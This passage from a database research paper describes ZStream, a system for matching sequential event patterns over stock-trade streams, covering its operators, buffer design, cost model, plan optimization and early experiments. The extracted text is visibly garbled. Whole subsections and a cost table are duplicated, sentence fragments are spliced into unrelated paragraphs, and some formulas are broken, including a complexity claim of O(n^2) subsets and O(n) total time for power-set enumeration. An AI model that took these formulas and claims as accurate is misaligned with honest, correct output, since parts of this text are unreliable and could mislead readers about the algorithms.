bound specified in the WITHIN clause. 3.1 Event Operators Event operators connect primitive or composite events to- gether to form new composite events. This section briefly describes the set of event operators supported in our system, and presents more example queries. Sequence (A; B): The sequence operator finds instances of event B that follow event A within a specified time window. The output is a composite event C such that A.end-ts < B.start-ts, C.start-ts = A.start-ts, C.end-ts = B.end-ts and C.end-ts − C.start-ts ≤ time window. Negation (!A): Negation is used to express the non- ocurrence of event A. This operator is usually used together with other operators; for example "A;!B; C" indicates that C follows A without any interleaving instances of B. Conjunction (A & B): Conjunction (i.e., concurrent events) means both both event A and event B occur within a specified time window, and their order does not matter. Disjunction (A | B). Disjunction means either event A or event B or both occurs within a specified time window. Since we allow both A and B to occur in disjunction, it is simply a union of the two event classes and also satisfies the time constraint. Kleene Closure (A* / A+ / A^num). Kleene closure means that event A can occur zero or more (*) or one or more (+) times. ZStream also allows the specification of a closure count to indicate an exact number of events to be grouped. For example, A^5 means five A instances will be grouped together. 3.2 Motivating Applications Sequential patterns are widely used in a variety of ar- eas, from vehicle tracking to system monitoring. We have illustrated a typical sequential pattern in Query 1. In this section, we show several more sequential patterns from stock market monitoring. The input stream has the same schema as that of Query 1. Query 2. Negation Pattern PATTERN T1; T2; T3 WHERE T1.name = T2.name = T3.name AND T2.price < x AND T3.price > x * (1 + 20%) WITHIN 10 secs RETURN T1, T3 Query 3. Kleene Closure Pattern PATTERN T1; T2; T3 WHERE T1.name = T3.name WHERE T2.name = 'Google' AND sum(T2.volume) > v AND T3.price > (1 + 20%) * T1.price WITHIN 10 secs RETURN T1, sum(T2.volume), T3 ZStream can support conjunction by efficiently joining \[ T_1 \text{.price} > (1 + x\%) \times T_2 \text{.price} \] sequential relation in Query 1 has a multi-class predicate associated with internal nodes. For example, the first complicated constraints specified via multi-class predicates are applied during this assembly procedure. Notice that this predicate is attached to the 'Google' node. Other operators can be represented in the tree model similarly; we describe ZStream’s operator implementations in Section 4.4. ![Figure 3: A left-deep tree plan for Query 1](image) Query 2 illustrates a negation pattern to find a stock whose price increases 20% from some threshold price \( x \) without any lower price in between during a 10 second window. Query 3 shows a Kleene closure pattern to aggregate the total trading volume of Google stock. This pattern is used to measure the impact on other stocks’ prices after high volume trading of Google stock. The expression \( T_2 \text{.price} > (1 + x\%) \times T_3 \text{.price} \) constrains the number of successive Google events in the Kleene closure to 5; the aggregate function \( \text{sum()} \) is applied to the attribute volume of all the events in the closure. 4. ARCHITECTURE AND OPERATORS In this section, we describe the system architecture and evaluation of query plans, as well as algorithms for operator evaluation. 4.1 Tree-Based Plans To process a query, ZStream first parses and transforms the query expression into an internal tree representation. Leaf buffers store primitive events as they arrive, and internal node buffers store the intermediate results assembled from sub-tree buffers. Each internal node is associated with one operator in the plan, along with a collection of predicates. ZStream assumes that primitive events from data sources continuously stream into leaf buffers in time order. If disorder is a problem, a reordering operator may be placed just after the leaf buffer. ZStream uses a batch-iterator model (see Section 4.3) that collects batches of primitive events before processing at internal nodes; batches are processed to form more complete composite events that are eventually output at the root. Figure 3 shows a tree plan for Query 1. This is a left-deep plan, because \( T_1 \) and \( T_2 \) are first combined, and their outputs are matched with \( T_3 \). A right-deep plan, where \( T_2 \) and \( T_3 \) are first combined, and then matched with \( T_1 \), is also possible. Single-class predicates (over just one event class) can be pushed down to the leaf buffers, preventing irrelevant events from being placed into leaf buffers. For example, \("T2\text{.name} = 'Google'\) can be pushed down to the front of the \( T_2 \) buffer such that only the events with their names equal to ‘Google’ are placed into the buffer. More complicated constraints specified via multi-class predicates are associated with internal nodes. For example, the first sequential relation in Query 1 has a multi-class predicate \("T1\text{.price} > (1 + x\%) \times T_2\text{.price}\) associated with it; hence this predicate is attached to the \( SEQ_1 \) node. Events coming from the associated sub-trees are passed into the internal nodes for combination, and multi-class predicates are applied during this assembly procedure. Notice that equality multi-class predicates can be further pushed to the leaf buffers by building hash partitions on the equality attributes. For instance, the equality predicate \("T1\text{.name} = T_3\text{.name}\) of Query 1 can be expressed as hashing on ‘\(T1\text{.name}\)’ and performing name lookups on the \( SEQ_2 \) node. Other operators can be represented in the tree model similarly; we describe ZStream’s operator implementations in Section 4.4. 4.2 Buffer Structure For each node of the tree plan, ZStream has a buffer to temporarily store incoming events (for leaf nodes) or intermediate results (for internal nodes). Each buffer contains a number of records, each of which has three parts: a vector of event pointers, a start time and an end time. If the buffer is a leaf buffer, the vector just contains one pointer that points to the incoming primitive event, and both the start time and end time are the timestamp of that primitive event. If the buffer contains intermediate results, each entry in the event vector points to a component primitive event of the assembled composite event. The start time and the end time are the timestamps of the earliest and the latest primitive event comprising this composite event. One important feature of the buffer is that its records are stored sorted in end time order. Since primitive events are inserted into their leaf buffers in time order, records in leaf buffers are automatically sorted by end time. For each internal non-leaf buffer, the node’s operator is designed in such a way that it extracts records in its child buffers in end time order and also generates intermediate results in end time order. This buffer design facilitates time range matching for sequential operations. In addition, The explicit separation of the start and end time facilitates time comparison between two buffers \( A \) and \( B \) in either direction (i.e., \( A \) to \( B \) and \( B \) to \( A \)), so that: 1. It is possible for ZStream to efficiently locate tuples in leaf buffers, so that ZStream can flexibly choose the order in which it evaluates the leaf buffers; 2. It is possible for ZStream to efficiently locate tuples also in internal node buffers matching a specific time range so that materialization can be used; and 3. ZStream can support conjunction by efficiently joining events from either buffer with the other buffer. In addition, by keeping records in the end-time order in buffers, ZStream does not perform any unnecessary time comparisons. Since each operator evaluates its input in end-time order, events outside the time range can be discarded once the first out-of-time event is found. Other buffer designs, based, for example, on pointers from later buffers to matching time ranges in earlier buffers (such as the RIP used in [15]), make flexible reordering difficult for sequential patterns. 4.3 Batch-Iterator Model For sequential patterns an output can only be possibly generated when an instance of the final event class occurs (e.g., \( B \) in the pattern \( A; B \)). If events are combined whenever new events arrive, previously combined intermediate results may stay in memory for a long time, waiting for an event from the final event class to arrive. If no events arrive from the final event class for a long time, these intermediate results are very likely to be discarded without even being used. Hence, ZStream accumulates events in leaf buffers in Idle rounds, and performs evaluation to populate internal buffers and produce outputs in Assembly rounds only after there is at least one instance \( f \) in the final event class’s buffer. During assembly, the system computes an earliest allowed timestamp (EAT) based on \( f \)’s timestamp. More specifically, the EAT in each assembly round is calculated by subtracting the time window constraint from the earliest end-timestamp of the events in the final event class’s buffer. Any event with start time earlier than the EAT cannot possibly satisfy the pattern and can be discarded without further processing. Specifically, the batch-iterator model consists of the following steps: 1. A batch of primitive events is read into leaf buffers with the predefined batch size; 2. If there is no event instance in the final event’s leaf buffer, go back to step 1; otherwise, go to step 3; 3. Calculate the EAT and pass it down to each buffer from the root; 4. Assemble events from leaves to root, storing the intermediate results in their corresponding node buffers, and removing out-of-date records, according to the implementation of each operator (see Section 4.4). Notice that steps 1-2 belong to idle rounds, which are used to accumulate enough primitive events; and steps 3-4 belong to assembly rounds, which are used to perform composition work. For in-memory pattern matching, memory consumption is considered an important issue. By taking the advantage of the batch-iterator model and evaluating the time window constraints as early as possible (EAT pushed to leaf buffers), ZStream can bound the memory usage efficiently. We will show this by reporting the peak memory usage in Section 6. ### 4.4 Operator Evaluation In this section, we describe the algorithms for operator evaluation. #### 4.4.1 Sequence Each sequence operator has two operands, representing the first and second event class in the sequential pattern. The algorithm used in each assembly round for sequence evaluation is given as follows: ``` Input: \text{right and left child buffers} \text{RBuf and LBuf, EAT} Output: \text{result buffer} \text{Buf} \begin{align*} 1 & \text{foreach } Rr \in \text{RBuf} \text{ do} \\ 2 & \text{if } Rr.\text{start-ts} < \text{EAT} \text{ then remove } Rr; \text{ continue; } \\ 3 & \text{for } Lr = \text{LBuf}[0]; \text{ Lr. end-ts } < \text{ Rr. start-ts}; \text{ Lr } \text{++ do} \\ 4 & \text{if } Lr.\text{start-ts} < \text{EAT} \text{ then remove } \text{Lr; continue; } \\ 5 & \text{if } Lr \text{ and } Rr \text{ satisfy value constraints then} \\ 6 & \text{Combine } Lr \text{ and } Rr \text{ and insert into } \text{Buf} \\ 7 & \text{Clear RBuf} \end{align*} ``` **Algorithm 1:** Sequence Evaluation To make sure the intermediate results are generated in end-time order, the right buffer is used in the outer loop, and the left buffer is in the inner one. In the algorithm, steps 2 and 4 are used to incorporate the EAT constraint into the sequence evaluation. We assume that all events arriving in earlier rounds have smaller timestamps than those arriving in later rounds. This means that for a sequence node, after the assembly work is done, records in the node’s right child buffer will not be used any more because all possible events that can be combined with them have already passed through the left child buffer and the combined results have been materialized. Hence, step 7 is applied to clear the sequence node’s right child buffer. #### 4.4.2 Negation Negation represents events that have not yet occurred. It must be combined with other operators, such as sequence and conjunction. ZStream does not allow negation to appear by itself as there is no way to represent the absence of an occurrence. Though we could add a special “did not occur” event, it is unclear what timestamp to assign such events or how frequently to output them. Semantically, it also makes little sense to combine negation with disjunction (i.e., \( A \lor B \)) or Kleene closure (i.e., \( A^* \)). Negation is more complicated than other operators because it is difficult to represent and assemble all possible non-occurrence events. If events specified in the negation clause occur, they can cause previously assembled composite events to become invalid. One way to solve this problem is to add a negation filter on top of the plan to rule out composite events that have events specified in the negation part occurred, as has been done in previous work [15]. An obvious problem with the last-filter-step solution is that it generates a number of intermediate results, many of which may be filtered out eventually. A better solution is to push negation down to avoid unnecessary intermediate results, which is what we will discuss in this section. Negation evaluation is performed using the NSEQ operator. The key insight of the NSEQ operator is that it can find time ranges when non-negation events can produce valid results. Consider a simplified pattern “\( A \land B; C \text{ WITHIN } tw \)” where \( tw \) is a time constraint. For an event instance \( c \) of \( C \), suppose there exists a negation event instance \( b \) of \( B \) such that 1. Any event instance of \( A \) that occurred before \( b \) does not match with \( c \) (because it is negated by \( b \)). 2. And conversely, any instance of \( A \) that occurred after \( b \) and before \( c \) definitely matches with \( c \) (because not negated by \( b \)). In this case, we say \( b \) negates \( c \). Thus, the NSEQ operator searches for a negation event that negates each non-negation event instance (each instance of \( C \) in the above example.) Figure 4(left) illustrates a right-deep plan for Query 2. Hash Partitioning is performed on the incoming stock stream to apply the equality predicates on stock.name. NSEQ is applied to find an event instance $t_2$ of $T_2$ that negates each event instance $t_3$ of $T_3$. The output from $NSEQ$ is a combination of such $t_2$ and $t_3$. In addition, the extra time constraints $T_1.start-ts \geq T_2.start-ts$ and $T_1.start-ts < T_3.start-ts$ are added to the $SEQ$ operator which takes the output of $NSEQ$ as an input. These time constraints determine the range of event instances of $T_1$ that can be combined with the events output from $NSEQ$ directly. Thus, this plan can reduce the size of unnecessary intermediate results dramatically. We now discuss the evaluation of $NSEQ$ and we assume that negation events are primitive. Figure 5 illustrates the execution of the simplified pattern “$A;!B;C$ WITHIN tw”. In such cases, the event that negates $c$ of $C$ is the latest negation event instance $b$ that causes $c$ to become invalid. For instance, $b_3$ negates $c_5$, which is recorded as “$b_3,c_5$” in the $NSEQ$ buffer. The time predicates $A.end-ts < C.start-ts$ and $A.end-ts \geq B.start-ts$ are pushed into the $SEQ$ operator. These indicate that, due to negation, only event instances of $A$ in time range $[3,5]$ should be considered (i.e. $a_4$). Finally, the composite result “$a_4,c_5$” is returned. The algorithm to evaluate $NSEQ$ when its left child is a negation event class is shown in Algorithm 2. $NSEQ$ works much the same as $SEQ$ except that the left buffer is looped through from the end to the beginning; and only negation events that negate events from the right buffer are combined and inserted into the result buffer (steps 7–9). When no negation event can be found to negate the instance from the right buffer, ($NULL$, $Rr$) is inserted into the result buffer instead (steps 5 and 10). The algorithm to evaluate $NSEQ$ where the right child is a negation class (“$B;!C$”) can be constructed similarly. In this case, the event that negates each $b$ should be the first event from $C$ that arrives after $b$ and also passes all predicates. Notice that Algorithm 2 only works for the case where negation event class’s multi-class predicates all apply to just one of the non-negation classes. However, if the negation event class has multi-class predicates over more than one non-negation event class, locating the direct matching range is more tricky. Some of the valid composite components may have been filtered out in $NSEQ$ because $NSEQ$ only contains the predicate information of two event classes. To solve this problem, more sophisticated extra predicates need to be added and more composed components need to be saved. This may cancel out the benefits of $NSEQ$. Hence, $Zstream$ applies a negation operator at the top of the query plan rather than using $NSEQ$ in such cases. ### 4.4.3 Conjunction Conjunction is similar to sequence except that it does not distinguish between the orders of its two operands, as it assembles events in both directions. The evaluation algorithm is shown in Algorithm 3. It is designed to work like a sort-merge join. It maintains a cursor on both input buffers ($Lr$ and $Rr$), initially pointing to the oldest not-yet-matched event in each buffer. In each step of the algorithm, it chooses the cursor pointing at the earlier event $c$ (lines 3–7), and combines with all earlier events in the other cursor’s buffer (lines 8–9). This algorithm produces events in end-time order, since it processes the earliest event at each time step. ### 4.4.4 Disjunction Disjunction simply outputs union of its inputs, so its evaluation is very straightforward: either input can be directly inserted into the operator’s output buffer if it meets both time and value constraints. Specifically, the output of disjunction is generated by merging events in the left buffer and the right buffer according to their end time. $Zstream$ does not materialize results from the disjunction operator because most of the time, they will simply be a copy of the inputs. ### 4.4.5 Kleene Closure Figure 4(right) shows a tree plan for Query 3. The input stock stream is first hash partitioned on $stock.name$, and the $Google$ buffer can be shared with all the partitions. Kleene Figure 6: Example KSEQ evaluation for the patterns “A; B^2; C^3” and “A; B^*; C^*” 5. COST MODEL AND OPTIMIZATIONS This section presents the cost model and optimization techniques used in ZStream. Based on the cost model, ZStream can efficiently search for the optimal execution plan for each sequential query. We also show that our evaluation model can easily and seamlessly adapt to a more optimal plan on the fly, and present optimizations for using hashing to evaluate equality predicates. 5.1 Cost Model In traditional databases, the estimated cost of a query plan consists of I/O and CPU costs. In ZStream, I/O cost is not considered because all primitive events are memory resident. ZStream computes CPU cost for each operator from three terms: the cost to access the input data, the cost of predicate evaluation and the cost to generate the output data. These costs are measured as the number of input events accessed and the number of output events combined. Formally, the cost C is: \[ C = C_i + (nk)C_i + pC_o \] (1) Here, the cost consists of three parts: the cost of accessing the input data \( C_i \), the cost to generate the output data \( pC_o \) and the cost of predicate evaluation \( (nk)C_i \), where \( n \) is the number of multi-class predicates the operator has (which cannot be pushed down), and \( k \) and \( p \) are weights. \( C_i \) and \( C_o \) stand for the cost of accessing input data and assembling output results respectively. Since both of them are measured based on the number of events touched, the weight \( p \) is set to 1 by default, which we have experimentally determined to work well. \( (nk)C_i \) stands for the cost of predicate evaluation. Since predicate evaluation is performed during the process of accessing the input data, its cost is proportional to \( C_i \). Based on our experiments, \( k \) is estimated to be 0.25 in ZStream. Table 1 shows the terminology that we use in the rest of this section. \( R_E \) determines the number of events per unit time. Hence \( R_E * TW_P * Pr_E \) can be used as an estimate of \( CARD_E \) (all instances of \( E \) that are active within the time period \( TW_P \)). Consider the plan shown in Figure 3; the \( CARD \) of \( T2 \) is \( R_{STOCK} * Pr_{T2} * (10sec) \), where \( Pr_{T2} \) is the selectivity for the predicate “\( T2.name = \text{"Google"} \)”. Sequential operators such as SEQ, KSEQ, NSEQ have implicit time constraints. \( Pr_{E1,E2} \) is used to measure the selectivity of such predicates. For example, the pattern “\( E1; E2 \)” implicitly includes a time predicate “\( E1.end-ts < E2.start-ts \)”, indicating that only event instances \( e1 \) of \( E1 \) that occur before instances $e_2$ of $E_2$ can be combined with $e_2$. $P_{E_1,E_2}$ does not apply to the cost formula for conjunction and disjunction as they are not sequential. $P_{E_1,E_2}$ is similar to $P_{E_1,E_2}$ except that it includes the selectivity of all multi-class predicates between $E_1$ and $E_2. Table 2 summarizes the input cost formulas ($C_{IO}$) and output cost formulas ($C_{DO}$) for each individual operator. The input cost $C_{IO}$ is expressed in terms of the number of input events that are compared and/or combined; and the output cost $C_{DO}$ is measured as the number of composite events generated by the operator (i.e., $CARD_O$). The total cost of an individual operator is the sum of its input cost, predicate cost and output cost as indicated in Formula 1. The implicit time selectivity $P_{I,A,B}$ is attached to the sequence operator’s input cost formula because the buffer structure automatically filters out all event instances $a$ of $A$ with $a.end-ts > b.start-ts$ for each event instance $b$ of $B$. The evaluation of conjunction and disjunction is independent of the order of their inputs; hence time predicates do not apply to their cost formulas. For disjunction, multi-class predicates are not included because an event on either of the two inputs can result in an output. The cost for Kleene closure is more complicated. If the closure count $cnt$ is not specified, exactly one group of the maximal number of closure events is output for each start-end pair. The number of accessed event instances $N$ from the middle input $B$ can be estimated as the number of events from $B$ that match each start-end pair. So $N = CARD_B * P_{I,A,B} * P_{I,B,C}$, where $A$ and $C$ represent the start and end event class. If the closure count $cnt$ is specified, then for any start-end pair, each event instance from $B$ that occurs in between this pair will be output $cnt$ times on average. Hence $N = CARD_B * P_{I,A,B} * P_{I,B,C} * cnt$. ZStream has two ways to evaluate negation. One is to put a negation filter on top of the whole plan to rule out negated events. The other is to use an NSEQ operator to push the negation into the plan. The cost of the first method ($NEG(SEQ(A, NSEQ(B, C)))$) includes two parts: the cost of the SEQ operator and that of NEG. The cost of SEQ can be estimated as above. The input cost for NEG is $CARD_{SEQ}$. It is not related to $CARD_B$ because the composite results from SEQ can be thrown out once an instance $b$ of $B$ between $A$ and $C$ is found. ZStream can find such a $b$ by finding the event that negates each $c$ of $C$, and hence it does not need to scan $B$. The cost of the second approach ($SEQ(A, NSEQ(B, C))$) also contains two parts: the cost to evaluate the SEQ and the cost to evaluate the SEQ operator. The input cost of the NSEQ is $CARD_C$ and not related to $CARD_B$ because ZStream can find each $c$’s negating event (which is just the latest event in $B$ before $c$) directly, without searching the entire $B$ buffer. The cost formulas shown in Table 2 assume that the operands of each operator are primitive event classes. They can be easily generalized to the cases where operands themselves are operators by substituting the cardinality of primitive event classes with the cardinality of operators. Then, the cost of an entire tree plan can simply be estimated by adding up the costs of all the operators in the tree. 5.2 Optimal Query Plan Our goal is to find the best physical query plan for a given logical query pattern. To do this, we define the notion of an equivalent query plan — that is, a query plan $p'$ with a different ordering or collection of operators that produces the same output as some initial plan $p$. In particular, we study three types of equivalence: rule-based transformations, hashing for equality multi-class predicates and operator reordering. 5.2.1 Rule-Based Transformations As in relational systems, there are a number of equivalent expressions for a given pattern. For example, the following two expressions are semantically identical: 1. $Expression_1: \langle A \land (B \lor C); D \rangle$ 2. $Expression_2: \langle A \lor (B \land C); D \rangle$ Their expression complexity and evaluation cost, however, are substantially different from each other. ZStream supports a large number of such algebraic rewrites that are similar to those used in most database systems; we omit a complete list due to space constraints. Based on these equivalence rules, we can generate an exponential number of equivalent expressions for any given pattern. Obviously, it is not practical to choose the optimal expression by searching this equivalent expression space exhaustively. Instead, we narrow down the transition space by always trying to simplify the pattern expression; a transition is taken only when the target expression: 1. has a smaller number of operators or, 2. the expression has the same number of operators, but contains lower cost operators. Plans with fewer operators will usually include fewer event classes, and thus are more likely to result in fewer intermediate composed events being generated and less overall work. If the alternative plan has the same number of operators, but includes lower cost operators, it is also preferable. The cost of operators is as shown in Table 2, which indicates that $C_{DIS} < C_{SEQ} < C_{CON}$ (NSEQ and KSEQ are not substitutable for other operators). Returning to the two expressions given at the beginning of this section, the optimizer will replace $Expression_1$ with $Expression_2$ because $Expression_2$ has fewer operators and the cost of Disjunction is smaller than that of Conjunction. 5.2.2 Hashing for Equality Predicates As a second heuristic optimization step, ZStream replaces equality predicates with hash-based lookups whenever possible. Hashing is able to reduce search costs for equality predicates between different event classes; otherwise, equality multi-class predicates can be attached to the associated operators as other predicates. As shown in Figure 3 (a tree plan for Query 1), the incoming stock stream is first hash partitioned on “name” as T1. Internally, T1 is represented as a hash table, which is maintained when T1 is combined with T2 in the SEQ1 node. When the equality predicate T1.name = T3.name is applied during SEQ2, this lookup can be applied directly as a probe for T3.name in the hash table built on T1. More formally, suppose \( P(A, B, f) \) denotes a predicate \( A.f = B.f \). If A and B are sequentially combined in the order \( A; B \), the hash table is built on \( A.f \) (because \( B \) is used in the outer loop in Algorithm 1). If A and B are conjunctively connected, hash tables are built on both \( A.f \) and \( B.f \) (because both A and B may have chances to be in the outer loop). Hash construction and evaluation can be easily extended to the case where there are multiple equality predicates. Suppose \( P_i(A_1, B_1, f_1) \) and \( P_j(A_2, B_2, f_2) \) are two equality predicates for a sequential pattern where \( A_i \) is before \( B_i \) (\( i = 1, 2 \)). Then, 1. If \( A_1 \neq A_2 \), build hash tables on both \( A_1.f_1 \) and \( A_2.f_2 \). 2. If \( A_1 = A_2 \) and \( f_1 = f_2 \), build a hash table on \( A_1.f_1 \). 3. Otherwise \( A_1 = A_2 \) and \( f_1 \neq f_2 \); build the primary hash table on \( A_1.f_1 \) and a secondary hash table on \( A_1.f_2 \). 5.2.3 Optimal Reordering Once a query expression has been simplified using algebraic rewrites and hashing has been applied on the equality attributes, ZStream is left with a logical plan. A given logical plan has a number of different physical trees (e.g., left-deep or right-deep) that can be used to evaluate the query. In this section, we describe an algorithm to search for the optimal physical tree for the sequential pattern. We first observe that the problem of finding the optimal order has an optimal substructure, suggesting it is amenable to dynamic programming, as in Selinger [14]. THEOREM 5.1. For a given query, if the tree plan \( T \) is optimal, then all the sub trees \( T_i \) of \( T \) must be optimal for their corresponding sub patterns as well. PROOF. We prove this by contradiction. Suppose the theorem is not true; then it should be possible to find a sub tree plan \( T_i \) with lower cost than \( T \), but with the same output cardinality. Using \( T_i \) as a substitute for \( T \), we would then obtain a better tree plan \( T' \) with lower total cost for the pattern, which contradicts the assumption that \( T \) is optimal. \( \square \) Based on the optimal substructure observation in Theorem 5.1, we can search for an optimal tree plan by combining increasingly larger optimal sub plans together until we have found an optimal plan for the whole pattern. The algorithm to search for the optimal operator order is shown as Algorithm 5. The algorithm begins by calculating the optimal sub plans from the event sets of size 2. In this case, there is only one operator connecting the event classes; hence its operator order is automatically optimal. In the outermost loop (line 2), the algorithm increases the event set size by 1 each time. The second loop (line 3) goes over all possible event sets of the current event set size. The third loop (line 4) records the minimal cost plan found so far by searching for all possible optimal sub-trees. The root of each optimal sub-tree chosen for the current sub-pattern is recorded in the \( ROOT \) matrix. In the end, the optimal tree plan can be reconstructed by walking in reverse from the root of each selected optimal sub-tree. The two function calls: \( calc_{inputcost}() \) and \( calc_{CARD}() \) are used to estimate the input cost and output cost of an operator according to Table 2. Algorithm 5 is equivalent to the problem of enumerating the power set of the operators, and hence generates \( O(n^2) \) subsets in total. For each subset, it performs one pass to find the optimal root position. Hence the total time complexity is \( O(n) \). Compared to Selinger [14], Algorithm 5 also takes the bushy plans into consideration. In practice, this algorithm is very efficient, requiring less than 10 ms to search for an optimal plan with pattern length 20. Figure 7 illustrates an example of an optimal plan generated when the pattern length is 4. During the final round, where the only event set to consider is the pattern (1, 2, 3, 4), the algorithm tries all possible combination of sub-lists: 1 with (2, 3, 4); (1, 2) with (3, 4); (1, 2, 3) with 4. The root of each optimal sub tree is marked. The final optimal (bushy) plan selected for this pattern is shown on the right. <table> <thead> <tr> <th>Operator</th> <th>Description</th> <th>Input Cost ( C_i )</th> <th>Output Cost ( C_o )</th> </tr> </thead> <tbody> <tr> <td>Sequence ((A;B))</td> <td>( A ) and ( B ) are two input event classes or partitions. The cost is expressed as the number of input combinations tried. ( Pt_{A,B} ) captures the fact that the sequence operator does not try to assemble any ( a ) of ( A ) with ( b ) of ( B ) where ( b ) occurs before ( a ).</td> <td>( CARD_A \ast CARD_B \ast Pt_{A,B} )</td> <td>( CARD_A \ast CARD_B \ast Pt_{A,B} )</td> </tr> <tr> <td>Conjunction ((A&amp;B))</td> <td>( A ) and ( B ) are two input event classes or partitions. Unlike Sequence, Conjunction can combine event ( a ) of ( A ) with any ( b ) of ( B ) within the time window constraint.</td> <td>( CARD_A \ast CARD_B )</td> <td>( CARD_A \ast CARD_B )</td> </tr> <tr> <td>Negation ((A&amp;B;C)) (top)</td> <td>Negation on top, expressed as: ( NEQ(SEQ(A,C);B) )</td> <td>( C_{SEQ} + CARD_{SEQ} \ast Pt_{A,B} \ast Pt_{B,C} )</td> <td>( CARD_{SEQ} + CARD_{SEQ} \ast (1 - Pt_{A,B} \ast Pt_{B,C}) \ast Pt_{A,C} )</td> </tr> <tr> <td>Negation ((A&amp;B;C)) (pushed down)</td> <td>Negation pushed down, expressed as ( SEQ(A,NSEQ(B,C)) )</td> <td>( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} )</td> <td>( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} )</td> </tr> </tbody> </table> As a second heuristic optimization step, ZStream replaces equality predicates with hash-based lookups whenever possible. Hashing is able to reduce search costs for equality predicates between different event classes; otherwise, equality multi-class predicates can be attached to the associated operators as other predicates. As shown in Figure 3 (a tree plan for Query 1), the incoming stock stream is first hash partitioned on “name” as T1. Internally, T1 is represented as a hash table, which is maintained when T1 is combined with T2 in the SEQ1 node. When the equality predicate T1.name = T3.name is applied during SEQ2, this lookup can be applied directly as a probe for T3.name in the hash table built on T1. More formally, suppose \( P(A, B, f) \) denotes a predicate \( A.f = B.f \). If A and B are sequentially combined in the order \( A; B \), the hash table is built on \( A.f \) (because \( B \) is used in the outer loop in Algorithm 1). If A and B are conjunctively connected, hash tables are built on both \( A.f \) and \( B.f \) (because both A and B may have chances to be in the outer loop). Hash construction and evaluation can be easily extended to the case where there are multiple equality predicates. Suppose \( P_i(A_1, B_1, f_1) \) and \( P_j(A_2, B_2, f_2) \) are two equality predicates for a sequential pattern where \( A_i \) is before \( B_i \) (\( i = 1, 2 \)). Then, 1. If \( A_1 \neq A_2 \), build hash tables on both \( A_1.f_1 \) and \( A_2.f_2 \). 2. If \( A_1 = A_2 \) and \( f_1 = f_2 \), build a hash table on \( A_1.f_1 \). 3. Otherwise \( A_1 = A_2 \) and \( f_1 \neq f_2 \); build the primary hash table on \( A_1.f_1 \) and a secondary hash table on \( A_1.f_2 \). <table> <thead> <tr> <th>Operator</th> <th>Description</th> <th>Input Cost ( C_i )</th> <th>Output Cost ( C_o )</th> </tr> </thead> <tbody> <tr> <td>Sequence ((A;B))</td> <td>( A ) and ( B ) are two input event classes or partitions. The cost is expressed as the number of input combinations tried. ( Pt_{A,B} ) captures the fact that the sequence operator does not try to assemble any ( a ) of ( A ) with ( b ) of ( B ) where ( b ) occurs before ( a ).</td> <td>( CARD_A \ast CARD_B \ast Pt_{A,B} )</td> <td>( CARD_A \ast CARD_B \ast Pt_{A,B} )</td> </tr> <tr> <td>Conjunction ((A&amp;B))</td> <td>( A ) and ( B ) are two input event classes or partitions. Unlike Sequence, Conjunction can combine event ( a ) of ( A ) with any ( b ) of ( B ) within the time window constraint.</td> <td>( CARD_A \ast CARD_B )</td> <td>( CARD_A \ast CARD_B )</td> </tr> <tr> <td>Negation ((A&amp;B;C)) (top)</td> <td>Negation on top, expressed as: ( NEQ(SEQ(A,C);B) )</td> <td>( C_{SEQ} + CARD_{SEQ} \ast Pt_{A,B} \ast Pt_{B,C} )</td> <td>( CARD_{SEQ} + CARD_{SEQ} \ast (1 - Pt_{A,B} \ast Pt_{B,C}) \ast Pt_{A,C} )</td> </tr> <tr> <td>Negation ((A&amp;B;C)) (pushed down)</td> <td>Negation pushed down, expressed as ( SEQ(A,NSEQ(B,C)) )</td> <td>( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} )</td> <td>( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} )</td> </tr> </tbody> </table> In this section, we describe a number of experiments we have run to evaluate the performance of ZStream. Our primary objectives were to understand to what extent the reordering optimizations described in the previous sections affect overall query performance and by how much ZStream can outperform a previously-proposed NFA-based approach [15]. We also look at the performance of negation push down and the efficiency of plan adaptation. Finally, we test ZStream on some real-world web log data in Section 6.5. ZStream is implemented in C++ using STL: list to maintain the buffer structure. We separately implemented the NFA-based approach described in [15]. It is also C++ based, and uses STL: deque to support RIP pointers on its stack structure. In our experiments, STL: deque (for random lookups) proved to be about 1.5 times faster than STL: list. Note that materialization is not supported in our NFA implementation because RIP implementation has difficulty to support materialization for multi-class range predicates (e.g., A:price > B:price for sequential pattern A:B). All experiments were run on a dual core CPU 3.2 GHz Intel Pentium 4 with one core turned off and 2 GB RAM. We ran ZStream on a pre-recorded data file; data was pulled into the system at the maximum rate the system could accept. System performance was measured by the rate at which input data was processed, i.e.: \[ \text{rate} = \frac{\text{Input}}{t_{\text{elapsed}}} \] where [Input] is the size of the input and \(t_{\text{elapsed}}\) is the total elapsed processing time, not counting time to deliver the output. The input data is stock trade data with the schema described in Section 3.2. We generate synthetic stock events so that event rates and the selectivity of multi-class predicates could be controlled. All experiments are the average of 30 runs. Peak memory usage are also reported for some experiments. ### 6.1 Parameters Affecting Costs In this section, we experiment on various factors that affect the costs of query plans, showing that the cost model proposed in Section 5 accurately reflects the system performance. #### 6.1.1 Multi-Class Predicate Selectivity We ran experiments on Query 4, a sequential pattern with a single predicate on the first two event classes, using a left-deep plan, a right-deep plan, and the NFA based approach. Here, incoming ticks have a uniform distribution over stock names, meaning relative event rates are 1 : 1 : 1 (that is, one Sun quote arrives for each IBM quote, and one Oracle quote arrives for each Sun quote). **Query 4.** Sequence Pattern “IBM; Sun; Oracle” with a predicate between IBM and Sun PATTERN IBM; Sun; Oracle WHERE IBM:price > Sun:price WITHIN 200 units Figure 8 shows the throughput of the two alternative plans (the left-deep and the right-deep plan) and the NFA approach for Query 4. The left-deep plan outperforms the right-deep plan because it evaluates the operator with the multi-class predicate between IBM and Sun first, such that it generates fewer intermediate results. The lower the selectivity, the fewer intermediate results the left-deep plan produces. Hence, the gap between the performance of the two plans increases with decreasing selectivity. When the predicate is very selective (1/32 for instance), the left-deep plan outperforms the right-deep plan by as much as a factor of 5. We also note that the NFA-based approach has similar performance to the right-deep plan in Figure 8. This is because the NFA constructs composite events using a backwards search on a DAG (Directed Acyclic Graph) [15]. This results in the NFA evaluating expressions in a similar order to the right deep plan. Our results show similar results for varying selectivity in longer sequential patterns. Figure 9 shows the estimates produced by our cost model for the left-deep plan and the right-deep plan of Query 4 with varying selectivities. This shows that our cost model can accurately predict the system behavior with varying selectivity. Example 6.1.2 Event Rates In this section, we study how varying the relative event rates of different event classes affects the cost of query plans for different queries. The intuition is that query plans that combine event classes with lower event rates first will generate a smaller number of intermediate results. Hence such query plans have 